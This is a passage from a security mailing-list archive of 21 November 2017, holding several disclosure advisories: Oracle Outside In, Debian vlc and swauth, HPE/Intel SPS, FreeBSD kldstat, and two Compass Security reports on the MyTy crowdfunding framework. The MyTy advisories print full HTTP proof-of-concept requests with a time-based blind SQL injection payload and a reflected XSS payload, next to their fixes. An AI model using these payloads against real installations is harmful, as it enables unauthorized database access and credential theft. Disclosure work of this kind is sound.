Secunia Research: Oracle Outside In Denial of Service Vulnerability

2017-11-21 Thread Secunia Research 
==

 Secunia Research 2017/10/21

  Oracle Outside In Denial of Service Vulnerability

==
Table of Contents

Affected Software1
Severity.2
Description of Vulnerability.3
Solution.4
Time Table...5
Credits..6
References...7
About Flexera ...8
Verification.9

==
1) Affected Software

* Oracle Outside In version 8.5.3.0.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerabilitiy

Secunia Research has discovered a vulnerability in Oracle Outside In,
which can be exploited by malicious people to cause a DoS
(Denial of Service).

The vulnerability is caused due to an error within the vstif6.dll,
which can be exploited to cause an out-of-bounds write memory access.

The vulnerability is confirmed in version 8.5.3.

==
4) Solution

Apply update.
https://support.oracle.com/rs?type=doc=2296870.1

==
5) Time Table

2017/03/14 - Vendor notified about vulnerability.
2017/03/17 - Vendor supplied bug ticket ID.
2017/05/10 - Vendor asks for extention of publishing deadline.
2017/05/11 - Replied to vendor with new publishing timeline.
2017/05/15 - Vendor supplies information of fix in main codeline.
2017/10/17 - Release of vendor patch.
2017/10/18 - Release of Secunia Advisory SA76869.
2017/11/21 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Behzad Najjarpour Jabbari, Secunia Research at Flexera

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2017-10051 identifier for the vulnerability.

==
8) About Flexera

Flexera  helps application  producers and enterprises  increase
application usage and the value they derive from their software.

http://www.flexerasoftware.com/enterprise/company/about/

Flexera delivers  market-leading  Software  Vulnerability Management
solutions  enabling  enterprises  to  proactively  identify  and
remediate software vulnerabilities, effectively reducing the risk of
costly security breaches.

http://www.flexerasoftware.com/enterprise/products/

Flexera  supports  and  contributes  to  the community in several
ways.  We  have  always  believed  that  reliable  vulnerability
intelligence and tools to aid identifying and fixing vulnerabilities
should be  freely available  for  consumers  to ensure that users,
who care about their online privacy and security, can stay secure.
Only a few vendors address vulnerabilities in a proper way and help
users get updated  and  stay secure.  End-users (whether private
individuals or businesses) are otherwise left largely alone,  and
that is why back in 2002, Secunia Research started investigating,
coordinating  disclosure  and  verifying software vulnerabilities.
In  2016,  Secunia Research  became  a  part  of  Flexera and today
our in-house software vulnerability research remains the core  of
the  Software  Vulnerability  Management  products  at Flexera.

https://secuniaresearch.flexerasoftware.com/community/research/

The  public Secunia Advisory database  contains  information  for
researchers, security enthusiasts, and consumers to lookup individual
products and vulnerabilities and assess, whether they need to take
any actions to secure their systems or whether a given vulnerability
has already been discovered

https://secuniaresearch.flexerasoftware.com/community/advisories/

==
9) Verification

Please verify this advisory by visiting the website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2017-18/

==

[SECURITY] [DSA 4045-1] vlc security update

2017-11-21 Thread Moritz Muehlenhoff 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4045-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
November 21, 2017 https://www.debian.org/security/faq
- -

Package: vlc
CVE ID : CVE-2017-9300 CVE-2017-10699

Several vulnerabilities have been found in VLC, the VideoLAN project's
media player. Processing malformed media files could lead to denial of
service and potentially the execution of arbitrary code.
   
For the oldstable distribution (jessie), these problems have been fixed
in version 2.2.7-1~deb8u1.

For the stable distribution (stretch), these problems have been fixed in
version 2.2.7-1~deb9u1.

We recommend that you upgrade your vlc packages.

For the detailed security status of vlc please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/vlc

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAloUoy8ACgkQEMKTtsN8
TjbphRAAhCEvfLSF28zzAzmirCHcchaV9c3GAplGIWUTVvoa2gzqmsCl2117TX//
1rfP1uXlKZZB4gQ/leNAX8HH5aaMy8pIagdUXJb9X/F8vxGsPpY6xgfZ7VlnfUpG
r1VTmpUSuXwaAO1PjtkQ5QEQ/UpcgjUtH8fXCMeHlmxjzDtRPaUv54m9otHUsb3L
g3Z2amA1cokvsLEVjug/Q5qUJ1XA+VVt1H5K3g2D7DfDYW7kXVVgB/KXG4412TJ0
JTkKe2EwAUpNGw42IngJa480O0ux6DyRiydYTtJJdkUqLwWEil7ReiTbimZKOA0q
bY7/1e6l8k3qNrTMSKbkVGQKSK/0csVWF2GBpk9ggLjEok79neWwqVv2ihtY6Olc
gTisa3rh3M2VFgybTOf8nkidFWL621+vwHTGkzbd1CNp8kM2IZviBNFk5oo0Negs
YvwroyDEii4jbqTfIPI983SofqlH0wk4wEYw25D2GNWp/7lVyJQuMD4FqpjjYL0C
iwzrvAafeSPSY6dPKi+4GVNq4fgtq2o+SGhEmiBUdz6FPZTe9qla5SYRcS+n694C
t5ZX+6fT2zM+ajjMyHVSewEHa8KVvqqF84UNGVELG7pEdtRmxq2w+cM0qUDhpjbD
xL9PswX2yvfXL/8EwjdmyWFXv6X0/i/CwI+G8RW9V0mkT2yclR8=
=zhxY
-END PGP SIGNATURE-

CSNC-2017-029 MyTy Blind SQL Injection

2017-11-21 Thread Advisories 
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  MyTy
# Vendor:   Finlane GmbH
# CSNC ID:  CSNC-2017-029
# CVE ID:   -
# Subject:  Blind SQL injection
# Risk: High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger 
# Date: 21.11.2017
#
#

Introduction:
-
MyTy[1] is a software framework that includes a crowdfunding module. It can be 
installed on a customer server and used to create whitelabel websites for 
crowdfunding platforms.

Compass Security discovered a web application security flaw in the crowdfunding 
module login process that allows an unauthenticated attacker to execute 
arbitrary SQL query against the database. This allows to read and modify the 
whole database, within the privilege limitations of the database user executing 
the queries.


Affected:
-
Vulnerable:
 * MyTy 5.0.4 to 5.1.6
 
 
Technical Description
-
During the login process, the user email and password are sent in a POST 
request. In this request, the login_email parameter is concatenated into an SQL 
query in a way that allows for SQL injection.

This was first discovered as a time-based blind injection with the following 
request:
===
POST /tycon/modules/crowdfunding/mvc/controller/ajax/user/login/show.php?popin=1
=simpleLogin=0 HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: [CUT BY COMPASS]
Content-Length: 154
Cookie: tyFl=de_de; XSRF-TOKEN=oBwu%2BTWkisoYIpFEzoHDdSceUSflgjymh2uN1wXxZKg%3D;
 lang=de; PHPSESSID=e1e71aroeb557v412tov9fu574; tyBl=en_us; cfce=1; 
 _ga=GA1.2.75537659.1504612703; _gid=GA1.2.1847726517.1504612703; 
 cf_cookie_policy_read=1; _gat=1
CSNC-HEN: Pentest1-Blue
Connection: close

login=1===%252Fprojekte%252Fsuchergebnisse.html%253F
_type=inline=1=simpleLogin
_email=test'%2b(select*from(select(sleep(20)))a)%2b'_password=1234
===


Workaround / Fix:
-
Install an up to date version of the MyTy software.

As a developer:
Strictly use prepared statements in order to protect the application from SQL 
injection.

Optional addition:
Validate all user input and filter dangerous characters, which can cause a 
change of the context and have to be filtered, cut or escaped e.g. " ' -- () ;


Timeline:
-
2017-11-21: Coordinated public disclosure date
2017-09-06: Release of fix in versions 5.0.12 and 5.1.7
2017-09-06: Initial vendor response
2017-09-06: Initial vendor notification
2017-09-06: Discovery by Nicolas Heiniger


References:
---
[1] https://www.finlane.com/loesungen/whitelabel-pages/
[2] https://github.com/sqlmapproject/sqlmap

[security bulletin] HPESBHF03798 rev.1 - HPE Proliant Gen10 Servers, DL20 Gen9, ML30 Gen9 and Certain Apollo Servers Using Intel Server Platform Service (SPS) v4.0, Local Denial of Service and Executi

2017-11-21 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03798en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbhf03798en_us
Version: 1

HPESBHF03798 rev.1 - HPE Proliant Gen10 Servers, DL20 Gen9, ML30 Gen9 and
Certain Apollo Servers Using Intel Server Platform Service (SPS) v4.0, Local
Denial of Service and Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2017-11-21
Last Updated: 2017-11-21

Potential Security Impact: Local: Denial of Service (DoS), Execution of
Arbitrary Code

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A vulnerability in HPE certain Gen10 Servers, DL20 Gen9, ML30 Gen9 and
certain Apollo servers with Intel Server Platform Service (SPS) v4.0 are
vulnerable to local Denial of Service and execution of arbitrary code.

**Note:** Intel has identified security vulnerabilities which could
potentially place impacted platforms at risk. An issue impacts Intel Server
Platform Service (SPS) v4.0 used in certain HPE servers. The SPS/ME firmware
used in Intels architecture can be compromised with physical access such
that non-authenticated code may be executed in the SPS environment outside of
the visibility of the user and operating system administrator. Intel has
released new revisions of the Intel Server Platform Service (SPS) firmware to
address this vulnerability.

References:

  - CVE-2017-5706 - Intel  server platform service
  - CVE-2017-5709 - Intel  server platform service

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE Apollo 2000 System ROM firmware prior to v1.26
  - HPE Apollo 4510 System ROM firmware prior to v1.26
  - HPE Apollo 6000 DLC System ROM firmware prior to v1.26
  - HPE ProLiant BL460c Gen10 Server Blade ROM firmware prior to v1.26
  - HPE ProLiant DL20 Gen9 Server SPS Firmware prior to v4.01.04.054
  - HPE ProLiant DL360 Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant DL380 Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant DL560 Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant DL580 Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant m710x Server Cartridge ROM firmware prior to v1.26
  - HPE ProLiant ML30 Gen9 Server SPS Firmware prior to 4.01.04.054
  - HPE ProLiant ML110 Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant ML350 Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant XL170r Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant XL190r Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant XL230k Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant XL450 Gen10 Server ROM firmware prior to v1.26
  - HPE Synergy 660 Gen10 Compute Module ROM firmware prior to v1.26, SPS
firmware prior to 04.00.04.28
  - HPE Synergy 480 Gen10 Compute Module ROM firmware prior to v1.26, SPS
firmware prior to 04.00.04.28

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2017-5706
  7.4 CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
  7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)

CVE-2017-5709
  7.4 CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N
  5.6 (AV:L/AC:H/Au:N/C:C/I:C/A:N)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has provided the following response to resolve the vulnerabilities in
SPS. HPE is working closely with Intel to ensure timely resolution of this
issue on HPE systems. HPE will resolve this vulnerability in our servers in
the following ways.

* For customers that currently have impacted HPE ProLiant and Synergy servers
at their locations, are available for download from HPEs support site.
Customers should refer to the Customer Bulletin HPE Servers:
  
  * [Some Systems Using Certain Intel Processors Are Vulnerable to Local
Denial of Service and Execution of Arbitrary Code for detailed
instructions](https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a0
036596en_us)

HISTORY
Version:1 (rev.1) - 21 November 2017 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subscribe: To initiate a

[SECURITY] [DSA 4044-1] swauth security update

2017-11-21 Thread Yves-Alexis Perez 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4044-1   secur...@debian.org
https://www.debian.org/security/Yves-Alexis Perez
November 21, 2017 https://www.debian.org/security/faq
- -

Package: swauth
CVE ID : CVE-2017-16613
Debian Bug : 882314

A vulnerability has been discovered in swauth, an authentication system for
Swift, a distributed virtual object store used in Openstack.

The authentication token for an user is saved in clear text to the log file,
which could enable an attacker with access to the logs to bypass the
authentication provided by swauth.

For the stable distribution (stretch), this problem has been fixed in
version 1.2.0-2+deb9u1.

We recommend that you upgrade your swauth packages.

For the detailed security status of swauth please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/swauth

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQEzBAEBCgAdFiEE8vi34Qgfo83x35gF3rYcyPpXRFsFAloUSQoACgkQ3rYcyPpX
RFutNAf/aMZwvT4w6JFji9JIMFrmhyFVqcoRy7F4lTkW3X+87RDUgDUEJafzYg88
FGoVX78jVAFIM9f0tRAtlJjHBpclX8nGxsG8OYYf5Gruaz5bpR9HD6ZOf0YIAFnq
k7afT4WAx1qg41KH5IVNDMGvYF434Emf9AnYga7VlI+PURMrqczHeuNsLBzgP/RF
TeLVgN4AF7Vx4lygT1cL8ypWjeow0mkSstDzafjfB0pKF+ZTivfxmf6Xf1000WHn
gbGHveZvTCUfeSIZBd2zL+S7j/GtkyN6q09tO2MwqTQxtFy/oXm2AaaVRLVSJzlC
imWRg0pOOJc5rt02ofjveM+EFc1lGg==
=Td0m
-END PGP SIGNATURE-

CSNC-2017-030 MyTy Reflected Cross-Site Scripting (XSS)

2017-11-21 Thread Advisories 
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  MyTy
# Vendor:   Finlane GmbH
# CSNC ID:  CSNC-2017-030
# CVE ID:   -
# Subject:  Reflected Cross-Site Scripting (XSS)
# Risk: High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger 
# Date: 21.11.2017
#
#

Introduction:
-
MyTy[1] is a software framework that includes a crowdfunding module. It can be
installed on a customer server and used to create whitelabel websites for
crowdfunding platforms.

Compass Security discovered a web application security flaw in the login page of
 the administration web console that allows an unauthenticated attacker to
 execute JavaScript code in the browser of a legitimate user. This allows, for
 instance, to redirect the user to a phishing page and gather credentials.


Affected:
-
Vulnerable:
 * MyTy 5.1.0 to 5.1.7


Technical Description
-
In the login page of the administration console, a tyLang parameter is passed
together with the user and the password in the login request. This parameter is
then included unencoded in the HTTP response.

The login request for a proof of concept is as follows:
===
POST /tycon/index.php HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: [CUT BY COMPASS]
Cookie: tyFl=de_de; XSRF-TOKEN=ZNc%2FZRg4sCgXP0g3IZZ8QxsO7caLshyKp7u75yiyW5o%3D;
 lang=de; PHPSESSID=b4pcsacfvpv716e3l825cqbuo3; tyBl=en_us; cfce=1;
 _ga=GA1.2.75537659.1504612703; cf_cookie_policy_read=1;
 _gid=GA1.2.1498092563.1504761922
CSNC-HEN: Pentest1-Blue
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

view=default==de"alert(1)
_user_id=0_user_hash==admin=123456
===

The HTTP response shows that the payload is returned unencoded in the HTML page:
===
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 07 Sep 2017 06:52:05 GMT
Content-Type: text/html; charset=utf-8

[CUT BY COMPASS]







myty-Login | myty 5.1.7/2017-09-06






var myty = {
version: '5.1.7',
revision: 5001007,
backend: {
basepath: '/tycon',
language: 'de"alert(1)',
themepath: '/tycon/themes/spring'
},
[CUT BY COMPASS]
===


Workaround / Fix:
-
Install an up to date version of the MyTy software.

As a developer:
This issue can be fixed by properly encoding dangerous characters in the output
according to the encoding rules of the respective type of context (HTML body,
argument, JS string, generated URLs). For normal HTML body content, the
following HTML entities can be used:
<->
>->
"->
'->
&->


Timeline:
-
2017-11-21: Coordinated public disclosure date
2017-09-08: Release of fix in version 5.1.8
2017-09-08: Initial vendor response
2017-09-07: Initial vendor notification
2017-09-07: Discovery by Nicolas Heiniger


References:
---
[1] https://www.finlane.com/loesungen/whitelabel-pages/

FreeBSD Security Advisory FreeBSD-SA-17:10.kldstat [REVISED]

2017-11-21 Thread FreeBSD Security Advisories 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-17:10.kldstatSecurity Advisory
  The FreeBSD Project

Topic:  Information leak in kldstat(2)

Category:   core
Module: kernel
Announced:  2017-11-15
Credits:Ilja van Sprundel
TJ Corley
Affects:All supported versions of FreeBSD.
Corrected:  2017-11-15 22:34:15 UTC (stable/11, 11.1-STABLE)
2017-11-15 22:49:47 UTC (releng/11.1, 11.1-RELEASE-p4)
2017-11-15 22:50:20 UTC (releng/11.0, 11.0-RELEASE-p15)
2017-11-15 22:35:16 UTC (stable/10, 10.4-STABLE)
2017-11-15 22:50:47 UTC (releng/10.4, 10.4-RELEASE-p3)
2017-11-15 22:51:08 UTC (releng/10.3, 10.3-RELEASE-p24)
CVE Name:   CVE-2017-1088

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit .

0.   Revision history

v1.0   2017-11-15  Initial release.
v1.1   2017-11-20  Corrected credit. Ilja van Sprundel first reported the
   issue to the project, but wasn't cited. The FreeBSD
   Security Team apologizes to Ilja for this oversight.

I.   Background

The kldstat(2) syscall provides information about loaded kld files.  The
syscall takes a userland argument of struct kld_file_stat which is then
filled with data about the kld file requested.

II.  Problem Description

The kernel does not properly clear the memory of the kld_file_stat
structure before filling the data.  Since the structure filled by the
kernel is allocated on the kernel stack and copied to userspace, a leak
of information from the kernel stack is possible.

III. Impact

Some bytes from the kernel stack can be observed in userspace.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch
# fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch.asc
# gpg --verify kldstat.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
 and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/10/r325867
releng/10.3/  r325878
releng/10.4/  r325877
stable/11/r325866
releng/11.0/  r325876
releng/11.1/  r325875
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:



VII. References



The latest revision of this advisory is available at

-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEEHPf/b631yp++G4yy7Wfs1l3PaucFAloToOxfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDFD
RjdGRjZGQURGNUNBOUZCRTFCOENCMkVENjdFQ0Q2NURDRjZBRTcACgkQ7Wfs1l3P
audl/RAAkPqcGvCMAHucBtZH2sySvM/1L1NTl0I61eJaDqgnjooo3hRq5J/dlNlt
zo48o2W0EOnr8QWJhVg1oADY5qxBVm8RldpAH1Y7lU1Pk1gw6buTvmlat9Y0TaRm
i3WCYe/yzC9X50x12dSu2QCeir+HDHrHB72KQDxPJak21e8BKq8vSq4cV3+K32IF